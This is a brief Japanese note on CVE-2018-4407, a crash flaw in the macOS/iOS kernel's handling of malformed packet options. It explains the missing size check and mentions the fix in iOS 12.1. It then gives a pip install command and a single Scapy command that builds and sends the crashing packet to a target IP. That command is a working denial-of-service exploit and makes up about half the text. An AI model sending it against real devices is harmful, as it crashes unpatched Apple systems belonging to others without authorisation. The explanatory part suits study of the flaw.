
CVE-2018-4407 概要と実装
原理は、ICMPパケットの他のフィールドを不正な状態にすることで、macOSまたはiphoneのカーネルが解析する際にサイズチェックが実装されていないため、クラッシュを引き起こす。
Appleは10月30日にリリースした「iOS 12.1」アップデートパッケージでこの脆弱性を完全に修正しました。
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))